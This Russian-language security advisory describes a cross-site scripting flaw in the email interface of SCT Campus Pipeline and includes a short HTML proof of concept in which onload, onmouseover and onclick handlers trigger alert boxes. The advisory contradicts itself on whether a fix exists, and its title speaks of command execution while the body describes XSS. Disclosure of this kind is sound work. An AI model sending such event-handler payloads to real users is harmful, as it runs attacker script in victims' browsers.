Выполнение произвольных команд приложения в SCT Campus Pipeline

Дата публикации:
18.04.2004
Всего просмотров:
778
Опасность:
Средняя
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
SCT Campus Pipeline
Уязвимые версии: SCT Campus Pipeline

Описание: Уязвимость обнаружена в SCT Campus Pipeline. Удаленный пользователь может выполнить XSS нападение.

e-mail интерфейс не фильтрует некоторые обработчики сценариев, типа onload(), onmouseover(), и onclick(). Удаленный пользователь может послать специально обработанный email, который, когда будет просмотрен целевым пользователем, выполнить произвольный код сценария в браузере целевого пользователя в контексте безопасности SCT Campus Pipeline сайта.

Пример/Эксплоит:

<html>
<body onload="alert('load')">
<img src="http://www.hackthissite.org/avatars/hts.jpg" 
onmouseover="alert('mouse')">;
<img src="http://www.hackthissite.org/avatars/hts.jpg" 
onclick="alert('clicked')">;
</body>
</html>

URL производителя:http://www.sct.com/Education/Products/Connected_Learning/CampusPipeline.html

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: SCT javascript execution vulnerability
или введите имя

CAPTCHA